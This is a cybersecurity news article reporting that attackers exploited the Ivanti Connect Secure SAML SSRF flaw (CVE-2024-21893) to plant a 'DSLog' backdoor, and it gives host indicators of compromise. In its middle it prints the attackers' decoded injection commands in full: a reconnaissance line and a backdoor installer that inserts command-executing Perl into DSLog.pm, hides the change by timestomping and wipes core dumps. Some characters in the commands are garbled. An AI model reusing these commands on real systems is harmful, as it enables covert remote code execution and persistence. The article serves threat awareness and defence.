Hackers Exploiting Ivanti SSRF Flaw to Inject DSLog Malware

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Post Sharing

Ivanti Connect Secure was previously discovered with another SSRF vulnerability that could allow unauthenticated threat actors to access unrestricted resources due to a flaw in the SAML module. The vulnerability was assigned with CVE-2024-21893, and the severity was 8.2 (High). 

In addition, this vulnerability was previously reported to be exploited by threat actors in the wild during disclosure. However, recent reports indicate that threat actors have leveraged this vulnerability to install a previously unknown and exciting “DSLog backdoor” on vulnerable devices.


Live Account Takeover Attack Simulation

How do Hackers Bypass 2FA?

Live attack simulation Webinar demonstrates various ways in which account takeover can happen and practices to protect your websites and APIs against ATO attacks


Hackers Exploiting Ivanti SSRF Flaw

According to the reports, this vulnerability affects the embedded SAML module on Ivanti devices that threat actors exploit by injecting a backdoor with command injection. This backdoor was accessed and controlled with a basic “API Key” mechanism.

Initial request

During the initial phase of the attack, threat actors send an unauthenticated SAML authentication request that consists of an encoded command with “RetrievalMethod URI.” The request was identified to be a URL-encoded request containing a base64 encoded command alongside the URI.

Decoding the request for URL and base64 provides the following line of command used by threat actors for exploitation.;echo echo $(uname – a;id)>/home/webserver/htdocs/dana-na/imgs/index2.txt| /usr/bin/base64 -d | /bin/bash;

This command gathers internal reconnaissance information and stores it into a file named “index2.txt” using the ‘echo’ command line tool. The encoded strings are also decoded using the base64 decode utility and bash command interpreter.

Backdoor Installation

Once the above command is executed successfully, the threat actors then attempt to install the backdoor on the vulnerable device using the same method of URL and Base64 encoding of commands. The request is as follows:;echo mount -o remount,rw / DESTFILE=”/home/perl/DSLog.pm” CLFILE=”/home/perl/DSLogMB.pm” if cat $DESTFILE | grep -q ‘HTTP_USER_AGENT’; then echo ‘OK’; else sed -i ‘102i\ my $ua = $ENV{HTTP_USER_AGENT};n my $req = $ENV{QUERY_STRING};n my $qur = ”da58bdb765904300581fe8a818c28cca7c0b62eabd7ce29f181924177c8f13c7”;n my @param = split(/&/, $req);n if (index($ua, $qur) != -1) {n if ($param[1]){n my @res = split(/=/, $param[1]);n if ($res[0] eq ”cdi”){n $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg;n $res[1] =~ tr/!-~/P-~!-O/;n system(${res[1]});n }n }n }’ $DESTFILE fi /bin/touch -r $CLFILE $DESTFILE rm -rf /var/cores/* /home/venv3/bin/python3 -c ‘import DSMonitor;DSMonitor.warmRestart()’| /usr/bin/base64 -d | /bin/bash;
Decoded backdoor command (Source: Orange Cyber Defense)

This backdoor command is executed on the compromised device, and the backdoor is inserted into an existing Perl file named “DSLog.pm”. The DSLog is a module responsible for logging authenticated web requests and web requests and system logs on the device.

Orange Cyber Defense offers a comprehensive breakdown of the backdoor, command execution, methodologies, and other technical details for those with a strong technical background.

Indicators of Compromise

Host-based IoC

Path + filename  Hash  Description
/root/home/perl/DSLog[.]pm N/A – varies  Legitimate DSLog Log module embedding the
/root/home/webserver/htdocs/danana/imgs/index[.]txt N/A – varies  backdoor
/root/home/webserver/htdocs/danana/imgs/index1[.]txt N/A – varies  Some seem to be random characters.
/root/home/webserver/htdocs/danana/imgs/index2[.]txt N/A – varies  Some seem to be random characters.
/root/home/webserver/htdocs/danana/imgs/logo[.]png Embedding the result of ‘uname -a’

Network-based IoC

Network Indicator  Type Description IP Address Massive exploitation activity

Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.